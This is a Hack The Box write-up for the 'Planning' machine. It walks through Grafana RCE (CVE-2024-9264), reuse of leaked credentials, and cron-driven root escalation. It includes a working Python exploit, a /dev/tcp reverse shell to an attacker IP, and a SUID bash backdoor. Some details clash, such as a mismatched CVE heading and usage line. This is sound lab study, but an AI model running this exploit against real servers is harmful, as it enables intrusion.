Planning
Summary
“Planning” is an easy-level Linux box from HTB’s Season 7. It challenges users to perform web and subdomain enumeration, leverage a Grafana RCE (CVE‑2024‑9264), escape from a Docker container, and execute a cron-based escalation to obtain root privileges.
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r
Executive Summary
The Planning machine presented a realistic, multi-layered attack scenario that showcased the risks of misconfigured services and insecure DevOps practices in containerized environments.
We began with external enumeration, identifying a vulnerable Grafana instance exposed on the subdomain grafana.planning.htb
. Using known credentials provided in the challenge and chaining it with CVE-2024-9264 (Grafana SQL Expressions RCE), we achieved initial access by executing a reverse shell inside a running container.
Inside the container, we enumerated the environment variables and discovered reused Grafana admin credentials, which allowed lateral movement to the host system via SSH. As user enzo
, we performed further enumeration and uncovered a custom crontab scheduling service, implemented via an unprotected JSON database.
Additionally, by inspecting network bindings, we discovered several internal services listening on 127.0.0.1
, including a custom service on port 8000
. However, the most impactful discovery was that the crontab system allowed arbitrary command injection, and those commands were executed by root without validation.
We exploited this by injecting a payload that copied /bin/bash
to /tmp/pwner
and set the SUID bit, then executed it with the -p
flag—granting us a fully privileged root shell on the host.
Challenge Information
Name: Planning
Platform: Hack The Box (HTB)
Category: Linux (Windows)
Difficulty: Easy
Objective: Exploit Linux to retrieve the flag.
Key Exploit:
Grafana
Name
Planning
Difficulty
Easy
Operating System
Linux
Points
20
Release Date
May 10, 2025
Created by
d00msl4y3r & FisMatHack
Enumeration
The first phase in attacking any target is thorough enumeration. In this case, we initiated a comprehensive TCP port scan using Nmap to identify open services and potential attack surfaces.
nmap -sC -sV -p- 10.10.11.68
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMv/TbRhuPIAz+BOq4x+61TDVtlp0CfnTA2y6mk03/g2CffQmx8EL/uYKHNYNdnkO7MO3DXpUbQGq1k2H6mP6Fg=
| 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKpJkWOBF3N5HVlTJhPDWhOeW+p9G7f2E9JnYIhKs6R0
80/tcp open http syn-ack ttl 63 nginx 1.24.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
This revealed only two open ports: 22 (SSH) and 80 (HTTP).
This indicates that name-based virtual hosting is in use. To properly interact with the web service, we mapped this domain to our local machine by editing /etc/hosts
:
echo "10.10.11.68 planning.htb" | sudo tee -a /etc/hosts

Subdomain Enumeration with ffuf
ffuf
Since virtual hosting was in play, it was logical to perform subdomain brute-forcing to uncover hidden services. We used ffuf
a common subdomain wordlist.
└─$ ffuf -u http://planning.htb -H "Host: FUZZ.planning.htb" -w ~/Desktop/Exploit/word/Discovery/DNS/services-names.txt -fw 6 | tee fuzing.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://planning.htb
:: Wordlist : FUZZ: /home/sofarz/Desktop/Exploit/word/Discovery/DNS/services-names.txt
:: Header : Host: FUZZ.planning.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6
________________________________________________
grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 48ms]
Another subdomain was discovered: grafana.planning.htb, which strongly implied the presence of a Grafana instance—a known attack surface in recent CVEs.
We updated /etc/hosts
again to resolve this subdomain:
echo "10.10.11.68 grafana.planning.htb" | sudo tee -a /etc/hosts
Navigating to http://grafana.planning.htb
confirmed the existence of a Grafana login panel.
Initial Foothold
With the subdomain grafana.planning.htb discovered during enumeration, the next logical step was to investigate the Grafana web application hosted there. Grafana is a widely used observability platform, and older or misconfigured instances have been subject to critical vulnerabilities.
The challenge description provided the following credentials:
Username: admin
Password: 0D5oT70Fq13EvB5r
We navigated to http://grafana.planning.htb/login
and attempted to authenticate:

Upon successful login, we gained access to the Grafana 11.0.0 dashboard. This version is known to be vulnerable to a Remote Code Execution (RCE) flaw—CVE-2024-9264—when the server is configured with certain plugins or integrations.

CVE-2024-6494
In Grafana 11.0.0, a new feature called SQL Expressions allows users to write expressions and transform the output of SQL queries. If improperly sandboxed or if a vulnerable plugin (like PostgreSQL, MySQL, or SQLite) is used without security restrictions, an attacker can abuse sql.Expression
fields to execute arbitrary shell commands.
This specific vulnerability was identified under CVE-2024-9264 and can lead to full code execution under the context of the Grafana process.
//poc.py
// python3 poc.py -u admin -p 0D5oT70Fq13EvB5r -c "bash -i >& /dev/tcp/10.10.xx.xx/4444 0>&1" http://grafana.planning.htb
import requests
import argparse
def authenticate(grafana_url, username, password):
login_url = f'{grafana_url}/login'
payload = {'user': username, 'password': password}
session = requests.Session()
response = session.post(login_url, json=payload)
if response.ok:
print("[+] Login successful")
return session
else:
print("[-] Login failed:", response.status_code)
return None
def create_reverse_shell(session, grafana_url, reverse_ip, reverse_port):
reverse_shell_command = f"/dev/tcp/{reverse_ip}/{reverse_port} 0>&1"
payload = {
"queries": [
{
"datasource": {
"name": "Expression",
"type": "__expr__",
"uid": "__expr__"
},
"expression": f"SELECT 1;COPY (SELECT 'sh -i >& {reverse_shell_command}') TO '/tmp/rev';",
"hide": False,
"refId": "B",
"type": "sql",
"window": ""
}
]
}
response = session.post(
f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
json=payload
)
if response.ok:
print("[+] Reverse shell payload created")
else:
print("[-] Payload creation failed:", response.status_code)
def trigger_reverse_shell(session, grafana_url):
payload = {
"queries": [
{
"datasource": {
"name": "Expression",
"type": "__expr__",
"uid": "__expr__"
},
"expression": "SELECT 1;install shellfs from community;LOAD shellfs;SELECT * FROM read_csv('bash /tmp/rev |');",
"hide": False,
"refId": "B",
"type": "sql",
"window": ""
}
]
}
response = session.post(
f"{grafana_url}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q100",
json=payload
)
if response.ok:
print("[+] Reverse shell triggered")
else:
print("[-] Trigger failed:", response.status_code)
def main(grafana_url, username, password, reverse_ip, reverse_port):
session = authenticate(grafana_url, username, password)
if session:
create_reverse_shell(session, grafana_url, reverse_ip, reverse_port)
trigger_reverse_shell(session, grafana_url)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--url', required=True, help='Grafana URL')
parser.add_argument('--username', required=True, help='Grafana username')
parser.add_argument('--password', required=True, help='Grafana password')
parser.add_argument('--reverse-ip', required=True, help='Reverse shell IP')
parser.add_argument('--reverse-port', required=True, help='Reverse shell port')
args = parser.parse_args()
main(args.url, args.username, args.password, args.reverse_ip, args.reverse_port)
Once the reverse shell was successfully established using the Grafana SQL Expressions RCE (CVE-2024-9264), our shell dropped us into what appeared to be a Docker container:
sh: 0: can't access tty; job control turned off
# whoami
root
# ls -la
total 64
drwxr-xr-x 1 root root 4096 Mar 1 18:01 .
drwxr-xr-x 1 root root 4096 May 14 2024 ..
drwxrwxrwx 2 grafana root 4096 May 14 2024 .aws
drwxr-xr-x 3 root root 4096 Mar 1 18:01 .duckdb
-rw-r--r-- 1 root root 34523 May 14 2024 LICENSE
drwxr-xr-x 2 root root 4096 May 14 2024 bin
drwxr-xr-x 3 root root 4096 May 14 2024 conf
drwxr-xr-x 16 root root 4096 May 14 2024 public
# pwd
/usr/share/grafana
This confirmed that Grafana was running in an isolated containerized environment. To understand the container’s configuration, we began by dumping the environment variables, which often reveal service credentials, file paths, and runtime configurations.
cd /usr/share/grafana
root@7ce659d667d7:~# env
env
AWS_AUTH_SESSION_DURATION=15m
HOSTNAME=7ce659d667d7
PWD=/usr/share/grafana
AWS_AUTH_AssumeRoleEnabled=true
GF_PATHS_HOME=/usr/share/grafana
AWS_CW_LIST_METRICS_PAGE_LIMIT=500
HOME=/usr/share/grafana
TERM=xterm-256
AWS_AUTH_EXTERNAL_ID=
SHLVL=2
GF_PATHS_PROVISIONING=/etc/grafana/provisioning
GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo
XTERM=term-256
GF_PATHS_DATA=/var/lib/grafana
GF_PATHS_LOGS=/var/log/grafana
PATH=/usr/local/bin:/usr/share/grafana/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
AWS_AUTH_AllowedAuthProviders=default,keys,credentials
OLDPWD=/var/lib/grafana
GF_PATHS_PLUGINS=/var/lib/grafana/plugins
GF_PATHS_CONFIG=/etc/grafana/grafana.ini
_=/usr/bin/env
Key Findings
GF_SECURITY_ADMIN_USER
& GF_SECURITY_ADMIN_PASSWORD
Confirmed login credentials for the Grafana web UI
GF_PLUGINS_ALLOW_LOADING_UNSIGNED_PLUGINS
Confirms that the shellfs
plugin is enabled, allowing the exploitation used for RCE
GF_PATHS_CONFIG
Path to Grafana's main configuration file (grafana.ini
)
GF_PATHS_DATA
Data storage directory within the container
The leaked credentials enzo : RioTecRANDEntANT!
appeared to be a reused system account and became immediately valuable for lateral movement outside the container.
Lateral Move: SSH Access as Enzo
Based on the credentials found in the environment, we attempted to authenticate to the host via SSH, and this successfully granted us access to the host system as enzo, confirming that the Docker container was misconfigured to reuse privileged credentials.
Privilege Escalation: Crontab Analysis
Upon gaining access to the host, we inspected scheduled tasks for misconfigurations or abuse opportunities. In /opt/crontabs
, we discovered a JSON-based crontab scheduler database:
enzo@planning:/opt/crontabs$ cat crontab.db
{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P P4ssw0rdS0pRi0T3c /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily","stopped":false,"timestamp":"Fri Feb 28 2025 20:36:23 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740774983276,"saved":false,"_id":"GTI22PpoJNtRKg0W"}
{"name":"Cleanup","command":"/root/scripts/cleanup.sh","schedule":"* * * * *","stopped":false,"timestamp":"Sat Mar 01 2025 17:15:09 GMT+0000 (Coordinated Universal Time)","logging":"false","mailing":{},"created":1740849309992,"saved":false,"_id":"gNIRXh1WIc9K7BYX"}
To further assess potential privilege escalation vectors, we enumerated all services listening on the host system:
enzo@planning:/opt/crontabs$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:38621 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
Of particular interest is 127.0.0.1:8000
, which is only accessible from localhost and likely intended as an internal service or admin panel.
Accessing Internal Service via SSH Port Forwarding
To investigate the service running on port 8000, we used SSH port forwarding from our attacker machine:
ssh -L 8000:127.0.0.1:8000 enzo@planning.htb
This command binds the remote host’s 127.0.0.1:8000
to our local localhost:8000
, allowing us to interact with the service via a browser or tools like curl
.
After forwarding, we visited:

To gain root access, we used the cron execution engine to create a SUID binary backdoor. Specifically:
Copy
/bin/bash
to a world-accessible locationSet the SUID permission bit
Execute the resulting binary with
-p
to escalateRun now.

Once the binary was created and marked with the SUID bit, we ran:
/tmp/pwner -p

We now had full root access on the host.
Last updated